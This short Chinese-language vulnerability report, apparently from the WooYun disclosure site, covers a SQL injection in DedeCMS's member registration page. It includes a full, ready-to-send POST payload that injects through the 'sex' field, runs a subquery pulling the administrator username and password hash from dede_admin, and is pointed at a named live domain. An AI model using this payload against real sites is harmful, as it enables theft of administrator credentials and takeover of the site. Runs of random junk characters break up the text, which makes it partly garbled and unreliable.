漏洞类型: SQL注射漏洞
$ P8 j# o- m" J0 C/ |9 c/ R0 u简要描述:# k! E; z! o+ z/ C& O5 C3 y
0 j _( C) S5 g) y+ E- ]/ P
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞. P6 x6 w! F" k% K
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
" a2 ^$ X) y9 P; L2 j详细说明:跟这个漏洞
) E1 ]: Z* @" r2 s" {$ n$ a% p
# a9 e' g% d& r6 W7 s2 f! ~1 w# m! gWooYun: Dedecms SQL注射导致审核机制绕过漏洞
9 u$ q( X8 T' H1 ?是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
8 S+ H9 t) ^* FPOST提交以下数据,其实不用POST提交的,这样隐蔽点.( K+ k1 I2 Z! H4 w2 a% A% u
: w% |. C5 d8 l, [
www.political-security.com/member/reg_new.php
0 C1 q1 O$ \+ j% T 3 O; K, z; g- F/ E. c7 G
POST& E+ H2 P# }0 T4 K4 D5 K7 z2 y- j
& b' f. L5 {7 T: {$ Xdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&# T9 i( M8 w/ n4 x: Z9 W
userid=c4rp3nt3r&uname=c4rp3nt3r
9 d1 o# U* Z' U( F' p) L&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss/ K) y @' J% @/ P
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
( M% d g' X2 z/ e1 k(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
* W7 c0 l) n. e; _%00&vdcode=glos&agree= |